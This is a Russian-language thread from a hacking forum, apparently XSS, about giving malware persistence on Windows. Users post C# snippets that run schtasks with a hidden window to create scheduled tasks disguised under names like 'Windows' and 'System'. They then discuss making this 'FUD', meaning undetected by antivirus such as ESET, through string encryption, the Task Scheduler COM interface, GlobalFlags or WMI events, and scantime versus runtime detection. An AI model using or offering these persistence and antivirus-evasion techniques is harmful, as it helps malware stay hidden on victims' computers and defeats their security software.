• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Реализация автозагрузки через планировщик, палит эсэт только.

ViCode

ripper
КИДАЛА
Регистрация
20.08.2019
Сообщения
413
Реакции
423
Пожалуйста, обратите внимание, что пользователь заблокирован
C#
Одна из моих реализаций, стал эсэт палить.
1570867244238.png

C#:
                Process cmd_start = new Process
                {
                    StartInfo = new ProcessStartInfo
                ("cmd", $"/C schtasks /create /tn \\Windows /tr Temp /st 00:00 /du 9999:59 /sc once /ri 1 /f")
                };
                cmd_start.StartInfo.CreateNoWindow = true;
                cmd_start.StartInfo.UseShellExecute = false;
                cmd_start.Start();
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Хотя нет :D
Теперь так:
1570867457697.png


C#:
 Process cmd_st= new Process
                {
                    StartInfo = new ProcessStartInfo
               ("cmd", $"/C schtasks /create /tn \\Windows /tr Temp /st 00:00 /du 9999:59 /sc once /ri 1 /f")
                };
                cmd_st.StartInfo.CreateNoWindow = true;
                cmd_st.StartInfo.UseShellExecute = false;
                cmd_st.Start();

В общем покалдуете фуд сделаете быстро.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
долго писал статью? ^_^
Ну а че, тегов нет больше)) назвал статьей, вспотел аж:D
 
Пожалуйста, обратите внимание, что пользователь заблокирован
моя статья, ток сильно не пинайте :smile17:
Скрытый контент для зарегистрированных пользователей.

1. открываем
2. далее открываем первую ссылку
3. видим решение, даже лучше чем у тебя
4. тырим и говорим что я написал сам ^_^ (это не в твою сторону ТС, это так все профессионалы делают)

ИТОГО: 2 минуты, долго искал ссылку на guglite
 
Пожалуйста, обратите внимание, что пользователь заблокирован
моя статья, ток сильно не пинайте :smile17:
Скрытое содержимое
ИТОГО: 2 минуты, долго искал ссылку на guglite

Методы с гугла заезжаны и детектятся... это лишь 1 из реализаций. Напиши почище что бы не палили ав вообще, свою реализацию, буду рад увидеть/юзать.
А теперь проскань рантайм и забудь про этот способ
Скинь рантайм тогда... что ли... хоть посмотреть. Или от фонаря ляпнул?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
то что не палится, ни кто не даст) в чем смысл ходить и раздавать деньги ^_^
от детектов этого спасет шифрование ресурсов со строками, но опять же как и говорят рантайм скорее всего запалит.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
то что не палится, ни кто не даст) в чем смысл ходить и раздавать деньги ^_^
от детектов этого спасет шифрование ресурсов со строками, но опять же как и говорят рантайм скорее всего запалит.
Ну я например ищу пути самосовершенствования и для меня одобрение этот же стимул писать и делать что то новое, по этому и выкладваю почти все свои наработки сейчас бесплатно. А когда твой код тролят, а не критикуют желание отпадает всякое, именно троялт...критику я люблю особенно подкрепленную чем то. По этому написал с радостью увижу исправления твои в моем коде.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
ладно уж тебе) юмор продляет жизнь ^_^ все кодеры проходят через это когда им говорят твой код гавно)
 
> В общем покалдуете фуд сделаете быстро.
Как ты представляешь подобную магию? Ща бы авторанится через шедулер, запуская его директом. Школьный метод, который как ни крути, фудовым в жизни не станет.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
> В общем покалдуете фуд сделаете быстро.
Как ты представляешь подобную магию? Ща бы авторанится через шедулер, запуская его директом. Школьный метод, который как ни крути, фудовым в жизни не станет.
Во как :confused: школьный? дайти хоть наводку на "не школьный" и как бы есть подобная реализации полного фуда...
 
Во как :confused: школьный? дайти хоть наводку на "не школьный" и как бы есть подобная реализации полного фуда...

Без проблем. Посмотри в сторону COM интерфейса того-же таск шедулера, с парой опций там можно сделать вполне вменяемый детект. Аверам пофиг на заюз. Или GlobalFlags / WMI events ( Тоже можно добится хорошего детекта, грамотно настроив ). Если есть реализация ФУДа под вышеописанное - прошу подкрепить это заявление пруфами.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Без проблем. Посмотри в сторону COM интерфейса того-же таск шедулера, с парой опций там можно сделать вполне вменяемый детект. Аверам пофиг на заюз. Или GlobalFlags / WMI events ( Тоже можно добится хорошего детекта, грамотно настроив ). Если есть реализация ФУДа под вышеописанное - прошу подкрепить это заявление пруфами.
1570877505461.png

К примеру. Рантайм хз... скантайм фуд полный.

Проверил Eset на виртуалке пропустил, промолчал. С вкл. инетом.
 
Посмотреть вложение 5836
К примеру. Рантайм хз... скантайм фуд полный.
C#:
var startInfo = new ProcessStartInfo();
                startInfo.FileName = "schtasks.exe";
                startInfo.CreateNoWindow = false;
                startInfo.WindowStyle = ProcessWindowStyle.Hidden;
                startInfo.Arguments = @"/create /sc MINUTE /mo 2 /tn ""System"" /tr """ + 1 + "\\" + 2 + @""" /f";
                Process.Start(startInfo);

Скантайм твоего файла фудовый. Причем скантайм к авторану вообще?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Скантайм твоего файла фудовый. Причем скантайм к авторану вообще?


Опять же фуд... еще 25 вариантов кинуть?)) мб уже полиморф захуячить)))
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Я про то, что фудовый - скантайм. Твой файл даже не запускался. Причём скантайм твоего файла к методу авторана? :D
Запускался, при эсэт, более возможности просто нет проверить. Как бы для шарпа/для паблика в конце концов вы че еще хотите от меня? :D
Даешь халяву для дрыщей, а тут еще придераются :D
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Скантайм != запуск. Разные понятия. Но не суть, просто критика, не более.
Тогда уже правильно сказать: Скантайм/Рантайм. Про рантайм я сказал(не тестил)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх